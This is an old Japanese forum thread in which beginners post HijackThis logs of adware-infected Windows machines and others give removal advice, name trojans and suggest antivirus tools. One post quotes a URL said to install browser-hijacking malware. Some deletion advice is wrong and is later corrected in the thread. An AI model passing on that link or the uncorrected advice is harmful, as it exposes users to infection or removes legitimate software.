C:\PROGRAM FILES\MSN MESSENGER\MSNMSGR.EXE
C:\WINDOWS\SYSTEM\DDHELP.EXE
C:\WINDOWS\SYSTEM\WMIEXE.EXE
C:\WINDOWS\デスクトップ\CS4P028.EXE
C:\WINDOWS\デスクトップ\CS4P028.EXE
C:\GIKONAVI.EXE
C:\WINDOWS\SYSTEM\PSTORES.EXE
C:\WINDOWS\デスクトップ\新しいフォルダ\HIJACKTHIS.EXE


416 :413:04/07/09 18:33 ID:/blwYwsJ
F0 - syst>m.ini: Shell=
F0 - R>ystem.ini: Shel>=
F0 - R>ystem.ini: UserInit=
O2 - BHO: (no name) - {53707962-6F74-2D53-2644-206D7942484F} - C:\Program Files\Spybot - Search & Destroy\SDHelper.dll
O2 - BHO: IE Agent - {00000000-0000-0000-0000-000000000221} - C:\PROGRA~1\LYCOS\IEAGENT\CSIE.DLL (file missing)
O2 - BHO: Url Catcher - {CE31A1F7-3D90-4874-8FBE-A5D97F8BC8F1} - C:\PROGRAM FILES\BARGAIN BUDDY\BIN2\APUC.DLL (file missing)
O2 - BHO: (no name) - {0019C3E2-DD48-4A6D-ABCD-8D32436323D9} - C:\WINDOWS\BXXS5.DLL
O3 - Toolbar: ????? - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\SYSTEM\MSDXM.OCX
O4 - HKLM\..\Run: [ScanRegistry] c:\windows\scanregw.exe /autorun
O4 - HKLM\..\Run: [SystemTray] SysTray.Exe
O4 - HKLM\..\Run: [LoadPowerProfile] Rundll32.exe powrprof.dll,LoadCurrentPwrScheme
O4 - HKLM\..\Run: [DiscDetector] C:\Program Files\Creative\ShareDLL\CtNotify.exe
O4 - HKLM\..\Run: [POINTER] point32.exe
O4 - HKLM\..\Run: [LoadQM] loadqm.exe
O4 - HKLM\..\Run: [TaskMonitor] c:\windows\taskmon.exe
O4 - HKLM\..\Run: [Disc Detector] C:\Program Files\Creative\ShareDLL\CtNotify.exe
O4 - HKLM\..\Run: [Adaptec DirectCD] C:\PROGRA~1\ADAPTEC\DIRECTCD\DIRECTCD.EXE
O4 - HKLM\..\Run: [Norton Auto-Protect] C:\PROGRA~1\NORTON~1\NAVAPW32.EXE /LOADQUIET
O4 - HKLM\..\Run: [WinampAgent] "C:\PROGRAM FILES\WINAMP\WINAMPa.exe"
O4 - HKLM\..\Run: [RealJukeboxSystray] "C:\PROGRAM FILES\REAL\REALJUKEBOX\tsystray.exe"
O4 - HKLM\..\Run: [RealTray] C:\Program Files\Real\RealPlayer\RealPlay.exe

417 :413:04/07/09 18:34 ID:/blwYwsJ
SYSTEMBOOTHIDEPLAYER
O4 - HKLM\..\Run: [QuickTime Task] "C:\WINDOWS\SYSTEM\QTTASK.EXE" -atboottime
O4 - HKLM\..\Run: [AudioHQ] C:\PROGRAM FILES\CREATIVE\SBLIVE\AUDIOHQ\AHQTB.EXE
O4 - HKLM\..\Run: [SM Unplug] SMUnplug.exe
O4 - HKLM\..\Run: [Search-Exe] "C:\PROGRAM FILES\SE\V11\SE.EXE" /H
O4 - HKLM\..\Run: [systray] C:\WINDOWS\SYSTEM\A.EXE
O4 - HKLM\..\Run: [Bargains] C:\Program Files\Bargain Buddy\bin2\bargains.exe
O4 - HKLM\..\Run: [bxxs5] RunDLL32.EXE C:\WINDOWS\BXXS5.DLL,DllRun
O4 - HKLM\..\Run: [stcinstaller] c:\installer\id53.exe
O4 - HKLM\..\RunServices: [DHCP95s] C:\WINDOWS\SYSTEM\DHCP95\DHCP95s.exe
O4 - HKLM\..\RunServices: [SchedulingAgent] mstask.exe
O4 - HKCU\..\Run: [MsnMsgr] "c:\Program Files\MSN Messenger\MsnMsgr.Exe" /background
O8 - Extra context menu item: ReGet用にリンクを一覧(&L) - C:\PROGRAM FILES\REGET\RG_List.htm
O8 - Extra context menu item: ReGetでダウンロード(&D) - C:\PROGRAM FILES\REGET\RG_Link.htm
O8 - Extra context menu item: ReGetで全てをダウンロード(&G) - C:\PROGRAM FILES\REGET\RG_All.htm

418 :413:04/07/09 18:35 ID:/blwYwsJ
O8 - Extra context menu item: Iriaでダウンロード - C:\WINDOWS\デスクトップ\IRIA107A\iria_ie1.htm
O8 - Extra context menu item: Iriaへ全てのURLを送る - C:\WINDOWS\デスクトップ\IRIA107A\iria_ie2.htm
O8 - Extra context menu item: Iriaでリンクのインポート - C:\WINDOWS\デスクトップ\IRIA107A\iria_ie3.htm
O8 - Extra context menu item: Iriaで選択範囲をダウンロード - C:\WINDOWS\デスクトップ\IRIA107A\iria_ie4.htm
O8 - Extra context menu item: Iriaですぐにダウンロード - C:\WINDOWS\デスクトップ\IRIA107A\iria_ie5.htm
O9 - Extra button: ReGet (HKLM)
O9 - Extra 'Tools' menuitem: &Re&Get (HKLM)
O9 - Extra button: ReGet (HKCU)
O9 - Extra 'Tools' menuitem: &Re&Get (HKCU)
O12 - Plugin for .mdz: C:\PROGRA~1\INTERN~1\Plugins\npmod32.dll
O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) - http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
O16 - DPF: {166B1BCA-3F9C-11CF-8075-444553540000} (Shockwave ActiveX Control) - http://download.macromedia.com/pub/shockwave/cabs/director/sw.cab
O16 - DPF: {74D05D43-3236-11D4-BDCD-00C04F9A3B61} (ウイルスバスター On-Line Scan) - http://a840.g.akamai.net/7/840/537/2004061001/housecall.trendmicro.com/housecall/xscan53.cab
O16 - DPF: {2B323CD9-50E3-11D3-9466-00A0C9700498} (Yahoo! Audio Conferencing) - http://cs.chat.yahoo.co.jp/v45/yacscom.cab
O16 - DPF: {2BC66F54-93A8-11D3-BEB6-00105AA9B6AE} (Symantec AntiVirus scanner) - http://security.symantec.com/sscv6/SharedContent/vc/bin/AvSniff.cab
O16 - DPF: Yahoo! Chat JP 2 - http://cs1.chat.yahoo.co.jp/c302/chat.cab

以上です。よろしくお願いします

419 :ひよこ名無しさん:04/07/09 19:25 ID:???
>>418
パソコン持って逃げろ。

420 :ひよこ名無しさん:04/07/09 20:05 ID:mCW3WmKD
なんか迷惑メール(エロサイト系)のやつがうざいのですがどうにかならないですか?
ビッグローブなんですがとりあえず迷惑メールの拒否やっていても微妙に名前などを変えてきてます

421 :ひよこ名無しさん:04/07/09 20:07 ID:???
VIAGRAとかな。

422 :ひよこ名無しさん:04/07/09 20:11 ID:???
>>414
トロイBargain Buddy。
nCase2。

423 :ひよこ名無しさん:04/07/09 20:20 ID:???
>>414
重症。Hijackthis以外を閉じて以下をFix。
O2 - BHO: IE Agent - {00000000-0000-0000-0000-000000000221} - C:\PROGRA~1\LYCOS\IEAGENT\CSIE.DLL (file missing)
O2 - BHO: Url Catcher - {CE31A1F7-3D90-4874-8FBE-A5D97F8BC8F1} - C:\PROGRAM FILES\BARGAIN BUDDY\BIN2\APUC.DLL (file missing)
O2 - BHO: (no name) - {0019C3E2-DD48-4A6D-ABCD-8D32436323D9} - C:\WINDOWS\BXXS5.DLL
O4 - HKLM\..\Run: [DiscDetector] C:\Program Files\Creative\ShareDLL\CtNotify.exe
O4 - HKLM\..\Run: [Disc Detector] C:\Program Files\Creative\ShareDLL\CtNotify.exe
O4 - HKLM\..\Run: [Search-Exe] "C:\PROGRAM FILES\SE\V11\SE.EXE" /H
O4 - HKLM\..\Run: [systray] C:\WINDOWS\SYSTEM\A.EXE
O4 - HKLM\..\Run: [Bargains] C:\Program Files\Bargain Buddy\bin2\bargains.exe
O4 - HKLM\..\Run: [bxxs5] RunDLL32.EXE C:\WINDOWS\BXXS5.DLL,DllRun
O4 - HKLM\..\RunServices: [DHCP95s] C:\WINDOWS\SYSTEM\DHCP95\DHCP95s.exe
O4 - HKLM\..\RunServices: [SchedulingAgent] mstask.exe

CSIE.DLL、APUC.DLL、BXXS5.DLL、CtNotify.exe、SE.EXE、A.EXE、
bargains.exe、DHCP95s.exe、をごみ箱に移して再起動。
終わったらAd-awareをもう一回実行してごみ掃除。

424 :ひよこ名無しさん:04/07/09 20:21 ID:IIndTejh
http://ime.nu/www14.smutserver.com/anime/piss/2002.04/05.html

ここのime.nuのあとにエロサイトがあるのですが
そこへ行くとウィンドウが出てきて閉じることができません。
それ以後、ブラウザのホームページが変わってしまい、
勝手にウィンドウが開いてしまう状態になってしまいました。
ブラウザのキャッシュを削除し、ad-awareでスパイウェアを削除しても
再起動すると元に戻ってしまいます。
環境はWindowsXP、IE6です。
よろしくお願いします。

425 :ひよこ名無しさん:04/07/09 20:23 ID:TCrsd82s
すみません。助けてください!
ラウンジの勇気がなくて見られない画像スレの297の4番目のリンクにあったサイトを踏んでしまいました。
そこには、MHTMLRedir.Exploit10というウィルス?スパイウェア?が入っていたらしく、踏んだ直後にパソコンがおかしかったので再起動し、
IEを起動しようとしたらおかしな状態になってしまいました。
スパイウェアがどうこうと書かれたページ?勝手にダウンロードされたプログラム?に飛ばされてしまったので、とりあえず
AD-awere5.0で感知したファィルを全て削除したのですが、現在すぐにパソコンがフリーズしてしまう状態にあり、
また、スタートページが書きかえられているみたいなので、お気に入りから別のページからスタートしようとしても
画面が白いままで何も表示されません。
どうか、どうか、助けてください!
OSはウィンドウズ98で、IEの6.0だと思います。
宜しくお願いします。

426 :ひよこ名無しさん:04/07/09 20:23 ID:???
>>424
ad-awareだけじゃ不十分。このスレのテンプレやんな。

427 :ひよこ名無しさん:04/07/09 20:26 ID:???
>>425
AD-awere5.0じゃなく6を更新して使え。
あとは>>426さんの指示にしたがいなさい。

428 :ひよこ名無しさん:04/07/09 20:58 ID:M8R0Ft7N
JSトロイアンボムとかいうウイルスにやられたんですけど。

429 :Opera最新版は7.52、lngファイルは7.50:04/07/09 21:01 ID:???
Opera v7.52のインストールと日本語化の手順

■v7.23以前をインストールしている場合は「アプリケーションの(プログラム)の
 追加と削除」からアンインストール。(7.5xからは上書きインストで問題ない)

■Opera本家から本体をダウンロード
  Opera7.5(最新版)http://www.opera.com/download/?lng=en&ver=7.52
 いちばん下の赤い DOWNLOAD ボタンを押す。

■Opera本家から本体ファイルをダウンロード
  Opera7.52(最新版)http://www.opera.com/download/?lng=en&ver=7.52
 いちばん下の赤いDOWNLOADボタンを押す。ダウンロードサイトを選ぶ。
 (米国サイトが成功率高い。混んでいたら別のサイトを選択)

■Opera本家から7.50用言語ファイルをダウンロード
  http://my.opera.com/community/customize/langs/
 Select Opera Version and Language ←バージョンと言語の選択ボックス
 ▼ボタンを押してリストを開く→Windows-7.50 Japnese(1) をそれぞれ選択→
 地球儀アイコンをクリック→ja_74818.lngという日本語用言語ファイルが選択される→
 Opera.exeが存在するフォルダにダウンロードする。★7.51用の日本語ファイルは
 アフォなので選んではダメ。7.52用日本語ファイルは未発表。

■Operaに日本語言語ファイルを設定
  Operaを起動→OperaのメニューのTools→Preferences→ Languages→
 User Interface Languageでchooseボタンを押す→ダウンロードしたja_74818.lng
 を選択→OK
 これでメニューは日本語で表示されるはずだが、日本語優先の設定もしておこう。
 Tools→設定→言語→「ウェブページの閲覧で優先する言語」で「追加」→
 japanese(ja)選択→「上へ移動」ボタンで一番上にする→「エンコード情報が不足
 しているページに使用するエンコード方法」→shift_jisを選択→適用→OK

430 :ひよこ名無しさん:04/07/09 21:03 ID:???
>>428
何ですか、それ?

431 :420:04/07/09 21:06 ID:mCW3WmKD
あれ?もしかしてすれ違いですか?

432 :ひよこ名無しさん:04/07/09 21:08 ID:???
>>431
釣られてあげるよ。 スレ (´∀`( ´∀`) チガイ
(・∀・)ニヤニヤ

433 :ひよこ名無しさん:04/07/09 21:09 ID:???
>>428
そんなのはウィルスの範疇に入んないよ。
一時ファイルの削除で充分。

434 :ひよこ名無しさん:04/07/09 21:10 ID:M8R0Ft7N
>>433
どんな悪さをするんですか?こいつは。

435 :ひよこ名無しさん:04/07/09 21:12 ID:???
>>431
それはOperaとは無関係な現象だ。

436 :ひよこ名無しさん:04/07/09 21:36 ID:???
このスレの助言にしたがいOperaをいれてみました。
軽くてよいなと思っていたのですが、いくつか海外のサイトをみていると
トップページがSearch for〜
とかいうところに固定されて、他のところに行けなくなりました。
アドレスのところにはabout:blankとなったままです。
ここの対処法を見てできることはしましたが、
IE用なので、うまくできないのがあります。
こまりました。



437 :ひよこ名無しさん:04/07/09 21:47 ID:???
>>436
((((;゚Д゚)))ガクガクガクブルブルブル
お…おまい…オペラでその症状って…アレじゃん!

438 :425:04/07/09 22:12 ID:VZMSkADe
425です。
テンプレを参考にして大分復旧したのですが、オンラインスキャンで以下の五つのウィルスが見つかりました・・・
BKDR_JEEMP.C
TROJ_BRISS.A
TROJ_BRISS.H
TROJ_BRISS.AE
TROJ_BRISS.HU
どうやって削除したらいいのでしょうか?

439 :ひよこ名無しさん:04/07/09 22:18 ID:???
いや…ノートン先生買ってきて更正してもらえよ

440 :425:04/07/09 22:30 ID:VZMSkADe
>>439
金欠なのと、パソコンがかなり古いので買い換えを検討しているため、できれば購入せずに直したいのですが・・・
もし購入するとしたらおいくらくらいするものなのでしょうか?

441 :ひよこ名無しさん:04/07/09 22:33 ID:???
7000円くらい。
無料でウイルス駆除したいとは初心者の考えそうなことだな

442 :ひよこ名無しさん:04/07/09 22:36 ID:???
>>440
ウイルスを調べてみて手動で削除。

それかFreeSoftや体験版を使って駆除。

Freeならこのあたりがお勧め。
AVG、BitDefender Free、A2

443 :425:04/07/09 22:42 ID:VZMSkADe
>>441
親切にありがとうございます。
7000円はちょっとキツイので他の方法を探して見ますね
>>442
ありがとうございます!
手動で削除する方法をウィルススキャンした際に少し見てみたのですが、レジストリエディタというものがどこにあるのかわからず断念してしまいました・・・
教えて頂いたAVG等はgoogle等で検索してダウンロードすればよいのでしょうか?
やはり手動よりそちらのソフトを使う方が簡単ですよね?

444 :ひよこ名無しさん:04/07/09 22:43 ID:???
AVG、BitDefender Free、A2では
TROJ_BRISS.Hと
TROJ_BRISS.HUは消せないはず。
ノートン先生買え

445 :ひよこ名無しさん:04/07/09 22:51 ID:???
毎度ありがとうございます、PC初心者板から来たと言って頂ければ
お安く致しますよ。

446 :ひよこ名無しさん:04/07/09 22:52 ID:???
TROJ_BRISS.H
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ_BRISS.H
BKDR_JEEMP.C
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=BKDR_JEEMP.C

調べたらこいつは最悪の組み合わせだな。
リカバリすれば一応すっきりするけど、
色んな情報がすでに外部に流出している可能性がある。
駆除後はあらゆるPassなどを変更したほうがいい。

>>425
体験版使いな。
ウイルスバスター評価版ダウンロード
ttp://www.trendmicro.com/jp/products/desktop/vb/evaluate/trial.htm
シマンテック/Norton AntiVirus体験版ダウンロード
ttp://www.symantec.com/region/jp/trial/index.html

447 :ひよこ名無しさん:04/07/09 22:52 ID:???
マジ?いくら?

448 :ひよこ名無しさん:04/07/09 23:01 ID:???
>>446
うわ…まるで末期癌みてーな組み合わせだなw
手遅れもいいとこ

449 :425:04/07/09 23:18 ID:VZMSkADe
>>446
レスが遅れてすみません!
自分でも勉強しようと思い、他のウィルス関係のスレ等を覗いていたもので。
そうなんですか・・・
初心者なので大して使いこなせていないと思うので、ヤフーに登録してあるパスワードの変更くらいでだいじょうぶだと思います・・・
体験版のリンクまで貼っていただいて、本当に本当に重ね重ねありがとうございます!
この板にはあまりきた事がないのですが、親切な方と無駄に煽る方がいらっしゃるみたいですね。。。

>>444
そうですか。。。
一応446さんに教えて頂いた体験版を試してみて、もしダメだったら検討したいと思います。
ありがとうございます。

450 :436:04/07/09 23:24 ID:???
>>437
アレって何ですか? 気になります。
トップページからどこにも行けないままです。Operaはアンインストール
しようと思います。


451 :ひよこ名無しさん:04/07/10 00:14 ID:???
Operaでもabout:blank Search for〜の症状が出るのかよ。スパイウェアは怖いな・・・。

452 :436:04/07/10 00:26 ID:???
>>451
かちゅーしゃをたちあげても、Search for〜のページが表示されます。
復旧に苦闘中です。

453 :436 ◆58tk9.IA5g :04/07/10 00:29 ID:???
問題は解決しました。

454 :ぼるじょあ ◆yBEncckFOU :04/07/10 00:32 ID:???
>>453
(・3・) エェー おめでd

455 :436 ◆58tk9.IA5g :04/07/10 00:34 ID:???
>>454
御世話になりますた

456 :ぼるじょあ ◆yBEncckFOU :04/07/10 00:36 ID:???
>>455
(・3・) エェー どういたしましてですYO

457 :ぼるじょあ ◆yBEncckFOU :04/07/10 00:41 ID:???

        「う〜〜っ」
  ∧_∧    ∧ ∧    ∧_∧
 ( ・3・ )   (・3・)    ( ・3・ )
 ( つ⊂ )   (つ⊂)   ( つ⊂ )
  ヽ ( ノ   ( ( )    ヽ ( ノ
 (_)し'     U U'    (_)し'


        「ぼるじょあ♪」
  ∧_∧    ∧ ∧    ∧_∧
 ∩ ・3・)∩∩ ・3・)∩ ∩ ・3・)∩
  〉    _ノ ヽ    _ノ  〉    _ノ
 ノ ノ  ノ   て ,) )   ノ ノ  ノ
 し´(_)    U´ ヽ⊃  し´(_)



458 :ぼるじょあ ◆NumbershW. :04/07/10 00:44 ID:???
(O3O) …。

459 :ひよこ名無しさん:04/07/10 00:46 ID:???
>>294 (>>412)
削除して完了だと思います。
ていうか,それぞれの値をチェックしてファイル名を控えておいて,
後でそれらのファイルの名前を変えるなり,削除するなりするべきかも。

てか,今は他に問題は起きていませんか?
大元の >>294 の問題,つまりいつの間に sexcams_jp.exe が起動されて
いるのかという問題がずっと気になってるんですが,
今 Ctrl + Alt + Del で sexcams_jp.exe って出てきますか?
出てこないならきちんと解決できてるんだろうなーと思うんだけど。。。

460 :ひよこ名無しさん:04/07/10 00:52 ID:???
“Ctrl + Alt + Del”ってのは、簡単に言うと
現在起動している全てのプログラムを見る方法ってな感じだよね?
かちゅ〜しゃやエクスプローラー以外の、覚えのない名前がソコに入っていれば
何らかのスパイウェアが、コソーリと起動しているって事っしょ?

461 :ひよこ名無しさん:04/07/10 01:01 ID:???
>>460
そんな感じですな。もっとも,正確には「全て」ではなさげ。
hijackThis の出力の方がより正確ですね。
TSR や VxD (バックグラウンドで動く,ドライバに近いプロセス) は
どうあがいても見えないっぽいんだけど,見る方法はあるのかなー…

462 :ぼるじょあ ◆yBEncckFOU :04/07/10 01:01 ID:???
>>460
(・3・) エェー  判断が難しいYO

463 :ひよこ名無しさん:04/07/10 01:08 ID:???
Hv6TBtDN9v2

464 :ひよこ名無しさん:04/07/10 01:10 ID:???
rF8Q7vFghmI

465 :ひよこ名無しさん:04/07/10 01:13 ID:???
lQ6U8Q4l5yk

466 :ひよこ名無しさん:04/07/10 01:15 ID:???
1gpthZNJkw2

467 :ひよこ名無しさん:04/07/10 01:24 ID:???
空爆されてる?

468 :ひよこ名無しさん:04/07/10 01:25 ID:???
そして静かな夜……

469 :ひよこ名無しさん:04/07/10 01:25 ID:???
nUlLPo

470 :そして静かな夜……:04/07/10 01:32 ID:???

  +     ゚  . +            . . .゚ .゚。゚ 。 ,゚.。゚. ゚.。 .。
   . .   ゚  . o    ゚  。  .  , . .o 。 * .゚ + 。☆ ゚。。.  .
               。       。  *。, + 。. o ゚, 。*, o 。.
  ゚  o   .  。   .  .   ,  . , o 。゚. ,゚ 。 + 。 。,゚.。
 ゚ ,   , 。 .   +  ゚   。  。゚ . ゚。, ☆ * 。゚. o.゚  。 . 。
。 .  .。    o   .. 。 ゚  ゚ , 。. o 。* 。 . o. 。 . .
        。   .   。  . .゚o 。 *. 。 .. ☆ . +. .  .
 。 .  . .   .   .  。 ゚。, ☆ ゚. + 。 ゚ ,。 . 。  , .。
    ゚  。   ゚  .  +。 ゚ * 。. , 。゚ +. 。*。 ゚.   . . .  .
 。  .   . 。 。゚. 。* 。, ´。.  ☆。。. ゚。+ 。 .。  .  。   .
  .   。  ゚ ゚。 。, .。o ☆ + ,゚。 *。. 。 。 .    。    .
 ゚ .゚ ゚  。゚ + 。. +。 * 。゚。゚., ,+ 。゚. 。 . .   ,    ,   .
゚。゚+゚`, o。。.゚*。゚ 。.゚ 。 ☆+。。゚. ° 。 .   ,      ゚    ゚
 。, .゚。 + ☆。,゚. o。 。+ 。゚.,  . ゚   ,   。     。   .   .
 ゚. o * 。゚。゚.。゚。+゚ 。 。 ゚。 ゚ 。  ゚
゚` .゚ .゚. ゚. . ゚  .  ゚  .   ,  .     .  .   。      ゚ .
 .  .     . ,     。       .           .  ,    .
      。                 ゚   .           。
 , .        .           ,       .     .
     。           ∧∧ ∧∧    。
                ( :;;;;;:::)( :;;;;: )
.   .             /:;;;;;: | | :;;;:ヽ
              〜(::;;;;;;:/.  |:;;;;;;: )
      ‐''"´'''"""''"`''""`"""''''''"´'''"""''"`''""""'''"''''''"`"""''''``'‐


471 :413:04/07/10 02:00 ID:W/MlVM8W
教えて頂いた通りにある程度してみました。
だいたい治ったようなのですが、ホットメールやヤフーに
ログインしようとすると、「プログラムの強制終了」になって
しまい、ログイン出来ないのですが・・・
なんとかならないでしょうか?

472 :ひよこ名無しさん:04/07/10 02:12 ID:???
>>413

>>423 で「消せ」と指示された [DHCP95s] は,きちんとしたアプリケーションっぽいですね。
http://www.t3.rim.or.jp/~temple/software.html
DHCP95 というアプリケーションに心当たりはありますか?
可能ならば,復活させてみてください。

それから [SchedulingAgent] も復活させてみて。

473 :472:04/07/10 02:15 ID:???
ちょっと間違い。アプリケーション名は「簡易DHCPサービス」って名前ですね。
自分でインストールした憶えがあるなら,復活させてみて下さい。
それから直リンゴメン。

474 :ひよこ名無しさん:04/07/10 02:20 ID:???
それから [DiscDetector] も復活させるべきかも。
これは Creative のサウンドカード関連のファイルのようですね。

475 :413:04/07/10 02:22 ID:W/MlVM8W
>>472
ありがとうございます。
やってみます。

476 :ひよこ名無しさん:04/07/10 02:30 ID:???
てか,CtNotify.exe と DHCP95s.exe,ごみ箱に棄ててしまいました?

まだごみ箱の中に残ってますか? 残っているなら元の場所に戻して下さい。
残ってなければ,Creative のアプリと「簡易DHCPサービス」を
再インストールする必要があるかも知れません。

477 :ひよこ名無しさん:04/07/10 02:32 ID:???
DiscDetectorは普通にとるとそうなんだが、
かなり戻すのはやばそう。
2つエントリーされている。普通はありえない。

478 :ひよこ名無しさん:04/07/10 02:35 ID:???
確かに。気になりますね。
# 私のマシンでは ATi のアプリ「Atipta」(atiptaxx.exe) が
# 2つエントリされていたりします(苦笑

479 :ひよこ名無しさん:04/07/10 02:42 ID:???
>>478
そいうことあるんですか。
クルクルと間違えました。申し訳ないです。

>>475さん
ごめんなさい。

480 :478:04/07/10 02:42 ID:???
あ,嘘だ。Atipta を無効にしてみるとどうなるのかな〜と実験してみたら
なんか自動的に復活したから感心してたんだ。

2つエントリがあって当たり前なのは,LoadPowerProfile くらいのものですかね。
やばげ。

481 :478:04/07/10 02:43 ID:???
>>479 んにゃ,私の方こそごめんなさい。嘘かも知れないです。

482 :Opera最新版は7.52、lngファイルは7.50:04/07/10 02:48 ID:???
Opera v7.52のインストールと日本語化の手順

■v7.23以前をインストールしている場合は「アプリケーションの(プログラム)の
 追加と削除」からアンインストール。(7.5xからは上書きインストで問題ない)

■Opera本家から本体をダウンロード
  Opera7.5(最新版)http://www.opera.com/download/?lng=en&ver=7.52
 いちばん下の赤い DOWNLOAD ボタンを押す。

■Opera本家から本体ファイルをダウンロード
  Opera7.52(最新版)http://www.opera.com/download/?lng=en&ver=7.52
 いちばん下の赤いDOWNLOADボタンを押す。ダウンロードサイトを選ぶ。
 (米国サイトが成功率高い。混んでいたら別のサイトを選択)

■Opera本家から7.50用言語ファイルをダウンロード
  http://my.opera.com/community/customize/langs/
 Select Opera Version and Language ←バージョンと言語の選択ボックス
 ▼ボタンを押してリストを開く→Windows-7.50 Japnese(1) をそれぞれ選択→
 地球儀アイコンをクリック→ja_74818.lngという日本語用言語ファイルが選択される→
 Opera.exeが存在するフォルダにダウンロードする。★7.51用の日本語ファイルは
 アフォなので選んではダメ。7.52用日本語ファイルは未発表。

■Operaに日本語言語ファイルを設定
  Operaを起動→OperaのメニューのTools→Preferences→ Languages→
 User Interface Languageでchooseボタンを押す→ダウンロードしたja_74818.lng
 を選択→OK
 これでメニューは日本語で表示されるはずだが、日本語優先の設定もしておこう。
 Tools→設定→言語→「ウェブページの閲覧で優先する言語」で「追加」→
 japanese(ja)選択→「上へ移動」ボタンで一番上にする→「エンコード情報が不足
 しているページに使用するエンコード方法」→shift_jisを選択→適用→OK

483 :478:04/07/10 02:50 ID:???
とか何とか言って調べてみると,「なぜか複数のエントリがあるアプリ」って
大して珍しくはないのかも。。。
ttp://www47.tok2.com/home/ihara/document/
 vptray .. Norton AntiVirus 関連らしい
 Ensoniq Mixer .. サウンドカード関連
混乱ヽ(;´Д`)ノ混乱

484 :ひよこ名無しさん:04/07/10 03:25 ID:???
こっちでもja_74818.lngなのか・・・?

485 :408:04/07/10 03:31 ID:???
>>409
>>403のとこからOpera 7.52 入れました。全部日本語で簡単に
できますた。tんx。ただこれってなんでこんな辺鄙なとこに
あるんですか? Opera本社のサイトで7.52日本語版を探しても
なかったけど、まさか…?


486 :ひよこ名無しさん:04/07/10 03:36 ID:???
>>485
うryしゅでしゅ

487 :ひよこ名無しさん:04/07/10 04:43 ID:???
>>486
はぁ??


488 :Opera最新版は7.52、lngファイルは7.50:04/07/10 05:21 ID:???
Opera v7.52のインストールと日本語化の手順

■v7.23以前をインストールしている場合は「アプリケーションの(プログラム)の
 追加と削除」からアンインストール。(7.5xからは上書きインストで問題ない)

■Opera本家から本体をダウンロード
  Opera7.5(最新版)http://www.opera.com/download/?lng=en&ver=7.52
 いちばん下の赤い DOWNLOAD ボタンを押す。

■Opera本家から本体ファイルをダウンロード
  Opera7.52(最新版)http://www.opera.com/download/?lng=en&ver=7.52
 いちばん下の赤いDOWNLOADボタンを押す。ダウンロードサイトを選ぶ。
 (米国サイトが成功率高い。混んでいたら別のサイトを選択)

■Opera本家から7.50用言語ファイルをダウンロード
  http://my.opera.com/community/customize/langs/
 Select Opera Version and Language ←バージョンと言語の選択ボックス
 ▼ボタンを押してリストを開く→Windows-7.50 Japnese(1) をそれぞれ選択→
 地球儀アイコンをクリック→ja_74818.lngという日本語用言語ファイルが選択される→
 Opera.exeが存在するフォルダにダウンロードする。★7.51用の日本語ファイルは
 アフォなので選んではダメ。7.52用日本語ファイルは未発表。

■Operaに日本語言語ファイルを設定
  Operaを起動→OperaのメニューのTools→Preferences→ Languages→
 User Interface Languageでchooseボタンを押す→ダウンロードしたja_74818.lng
 を選択→OK
 これでメニューは日本語で表示されるはずだが、日本語優先の設定もしておこう。
 Tools→設定→言語→「ウェブページの閲覧で優先する言語」で「追加」→
 japanese(ja)選択→「上へ移動」ボタンで一番上にする→「エンコード情報が不足
 しているページに使用するエンコード方法」→shift_jisを選択→適用→OK

489 :478:04/07/10 05:33 ID:???
            _ -── - _
 ヽ | | | |/    , ',´ / (  ヽ、ヽ`ヽ
三 す 三   //   ヽ     /   ヾヽ
三 ま 三 .////   ,,,,,,,,,,,,,,,,,,,,    、ヾヽ
三 ぬ 三l!//   ::::::::::;;;;,;::::;;;;;;:::::::::::  、ヾ||
 / | | | |ヽ.|||/      ''::::::::::::''      ヽ|||
      |||||  ,,,llllllllllll,,,,     ,,,,llllllllllll,,,  ||||
     ノ||,ll|  ,...:::::::::...、 "  " ,...:::::::::...、   |-l  ヽ | | | |/
    . ハ|   :‐=エoユ-:  | l :‐エoユ=-:  |ハ| 三 す 三
     l| |(|  `'':|:| |::''´ .|   `''::| |:::''´  |)! || 三 ま 三
     lヽヾ|ll   | |:   | ! l   | |    ll!ソ,| 三 ぬ 三
     |||\!lll、  | |,,,,,,,,(_, |_l 、_),,,,,, | |:.   ,lllレ'リ / | | | |ヽ
     .|||||||l`!llllllll lll ,,,,;;;;;;;;i i;;;;;;;;,,,, lll lllllllll/|||||
     |||||||||||ヽllllllll /工工工工ヽ llllllll/|||||||
    ソ|||||||||||||ヽ.lll l::::::::::::::::::::::::::l llll,/ !||||||||||ヽ
    ノ||||||||||||/| \l. `-‐‐==‐‐-´ l/ |_||||||||||||___
    .||ll_l,k-‐‐|\゙、\ ::::::)⌒(::::::::/ !/::::/::::l  "|`ーr‐、
 _ -‐ '":::::::::::/|、::::\ ヽ ____  '´ /::::/:::::::::::|  |::::::::::::
:::::::::::::::::::::::::::::::::::::\:::::\      /::::/::::::::::::::::::|  |:::::::::::::

490 :ひよこ名無しさん:04/07/10 05:48 ID:7H4Fb9VL
すみません、失礼します。
あるスレにあったURLをクリックしたら複数のウイルスに感染してしまい、
テンプレやトレンドマイクロ社のページを参考にファイル削除をしたのですが、
あと2個、どうしても消せません。
・TROJ_AGENT.AC
 →検索してもファイル自体が出てこないので削除できず。
・TROJ_SMALL.IX
 →検索して出てきた4つのファイルを削除した後、
  「レジストリにアクセスエラー発生」といったメッセージが出て
  「レジストリを修復し再起動」され、削除したファイルも復活。

OSはWinMEで、ブラウザはIE6.0です。リカバリするしかないでしょうか?

491 :ひよこ名無しさん:04/07/10 05:53 ID:???
>>478
DiscDetector が2つあるの普通ですよ、よく見ると微妙に違います。

DiscDetector
Disc Detector

492 :ひよこ名無しさん:04/07/10 05:59 ID:???
>>490

1. システムの復元をする。

2 . >>10をやって偉い人に見てもらう。

493 :ひよこ名無しさん:04/07/10 06:11 ID:???
>>485
Opera本社公認のミラーサイトだから問題無いと思うけど何で日本語版があるのかはわからん

494 :ひよこ名無しさん:04/07/10 06:19 ID:???
>>485
       ∧         ∧
        / ヽ        ./ .∧
     /   `、     /   ∧
    /       ̄ ̄ ̄    ヽ   ふ〜、信じろ。
   /:::::::::            .\
  /:::::::::: ヽ-=・=-′ ヽ-=・=- ∧/           ∧
  ヽ:::::::::::    \___/   / ヽ          / ヽ
    ヽ::::::::::::::    \/    /   ヽ_____/  ヽ
